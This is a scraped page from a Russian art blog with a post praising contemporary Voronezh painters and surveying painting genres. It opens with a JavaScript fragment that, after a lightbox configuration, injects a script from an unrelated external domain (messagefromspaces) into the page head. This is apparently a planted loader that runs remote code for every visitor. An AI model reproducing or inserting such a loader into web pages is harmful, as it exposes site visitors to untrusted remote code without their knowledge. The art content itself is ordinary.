, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Живопись воронежских художников

Автор: Дмитрий Алмазов | 14 Фев 2014

Портрет Фоминова В.В. на фоне Воронежского пейзажаКак можно передать пространственное богатство мира? Как передать всё то, что находиться вокруг нас, в каждом уголке нашей вселенной, в лицах прохожих, всё то во что мы верим и то, что сами создаём?

Всё это может передать один из необычных видов изобразительного искусства — живопись, которая создаётся художниками с помощью зрительного образа и разнообразных красок наносимых на гибкую или твёрдую поверхность. Основа для живописи может быть разной: камень, холст, шёлк, бумага, кожа. Этот вид изобразительного искусства может встречаться в архитектуре, скульптуре, а так же быть частью искусственной и природной среды.

Картина маслом Дуленкова В.В.  ВоронежОсобенность живописи заключается как в технике передачи изображения, так и в её композиции. Основное значение в живописи отдаётся цвету, который выражается как сама идея восприятия передаваемого образа.

На протяжении веков, благодаря художникам, живопись преображалась, раскрывая всё новые жанры: портретный, архитектурный, пейзажный, исторический, батальный, жанровый, религиозный. Это помогало художникам отражать всё более изящней действительность нашего мира.

Наиболее распространённым жанром живописи является портрет, который  изображает человека, передавая его чувства и эмоции на полотно. Так же не менее распространённым считается пейзаж, который стал одним из важнейших живописных жанров, часто используемый художниками в своих творениях. Менее слышимый в обиходе, но часто используемый является жанр живописи марина. Его особенность заключается в домик с церквушкой Воронежизображении моря и морских сражений.  Данными жанрами в совершенстве владеют наши современные Воронежские художники: Фоминов Виктор, Киприянова Наталья, Дуленкова Наталия участники проекта «Лаборатория Искусства». Живописные работы этих художников выразительны, эстетичны и уникальны в своём исполнении.

Мастерство, реалистичность и, конечно, творческое видение художников являются неотъемлемой особенностью живописи, которая не сотрётся во времени  и не потеряется в пространстве.

Заказать живопись воронежских художников Вы можете по телефону 8(960)134-46-27 или написать письмо на странице контакты.

Темы: Арт Воронеж, Изобразительное искусство, Новости, Портрет, Художник | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress